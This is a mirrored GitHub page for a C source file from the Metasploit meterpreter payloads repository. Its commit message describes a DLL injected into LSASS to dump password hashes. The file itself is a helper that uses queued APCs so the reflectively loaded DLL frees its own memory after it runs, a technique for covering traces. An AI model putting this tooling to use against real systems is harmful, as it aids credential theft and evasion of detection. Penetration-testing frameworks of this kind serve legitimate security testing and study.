github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-06 01:16:37 +02:00
Code Releases Activity
1a370ab66e
metasploit-payloads/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c
Spencer McIntyre d114f5ec0a Add the dump_sam project 
This is going to build a stand-alone RDLL that can be injected into
LSASS for hashdump.

The samsrv.dll functions still need to be resolved because they're not
exported but the rest can be used normally thanks to the RDLL loader.
Defined 32-bit and 64-bit structures that are compatible with MSVC and
MinGW. DLLs are dynamically linked for size and the Visual-C Runtime is
not used.

The reflectively loaded DLL is freed once the operation has completed.
2023-04-27 09:52:50 -04:00

49 lines
1.7 KiB
C
Executable File
Raw Blame History

#include "ReflectiveFreeAndExitThread.h"
typedef NTSTATUS
(*NtQueueApcThread)(
HANDLE ThreadHandle,
PVOID ApcRoutine,
ULONG_PTR SystemArgument1,
ULONG_PTR SystemArgument2,
ULONG_PTR SystemArgument3
);
VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) {
NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread");
HANDLE hThread = NULL;
HANDLE hThisThread = NULL;
do {
if (!pNtQueueApcThread)
break;
// create a suspended thread that will just exit once the APCs have executed
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExitThread, 0, CREATE_SUSPENDED, NULL);
if (!hThread)
break;
// open a real handle to this thread to pass in the APC so it operates on this thread and not itself
hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId());
if (!hThisThread)
break;
// tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited
pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE);
// then close the handle so it's not leaked
QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);
// then free the memory
pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
ResumeThread(hThread);
} while (FALSE);
if (hThread)
CloseHandle(hThread);
ExitThread(dwExitCode);
return;
}
View Git Blame Copy Permalink